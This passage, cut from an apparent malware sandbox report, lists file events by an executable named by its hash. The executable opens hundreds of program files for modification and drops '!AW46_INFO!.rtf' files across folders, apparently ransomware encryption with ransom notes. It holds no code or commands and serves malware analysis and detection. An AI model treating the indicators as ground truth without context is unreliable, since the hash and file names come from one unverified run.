Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yerevan 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-tools.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\common.js 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_it.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_basestyle.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Krasnoyarsk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Martinique 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ulaanbaatar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\serialver.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Curacao 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\javafx.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\PST8 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\EST5 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtau 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+7 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_de_DE.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Currie 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\id.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Stanley 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Samarkand 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Currie 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app_1.0.300.v20140228-1829.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\jabswitch.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Syowa 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\ssvagent.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Marquesas 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_fr.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\security\blacklist 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Glace_Bay 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-dialogs.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Amman 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Norfolk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\SplitExport.vst 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuching 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\management\snmp.acl.template 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\PST8PDT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiItalic.ttf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\ConvertFromPing.3gp2 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Port-au-Prince 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.CMP 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\ZoneInfoMappings 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\epl-v10.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\SmallLogo.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\minidump-analyzer.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\gmail.crx 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.dtd 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\sRGB.pf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-modules-appui.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\master_preferences 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Norfolk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\LICENSE 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\kinit.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Update\Install\{5DF2DCA9-BD54-4513-9B32-2C551D72B961}\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Paris 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jawt.h 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-progress.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Mozilla Firefox\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Antigua 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\xul.dll.sig 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-snaptracer.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Adak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\InstallDeny.ram 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\La_Rioja 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\management.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookicon.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\MANIFEST.MF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Sydney 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.zh_CN_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ceuta 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer_3.2.200.v20140827-1444.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaSansDemiBold.ttf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-plaf.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Malta 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Lisbon 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SplashScreen.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kabul 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.password.template 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Costa_Rica 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\keytool.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Pyongyang 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mauritius 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\pingsender.exe 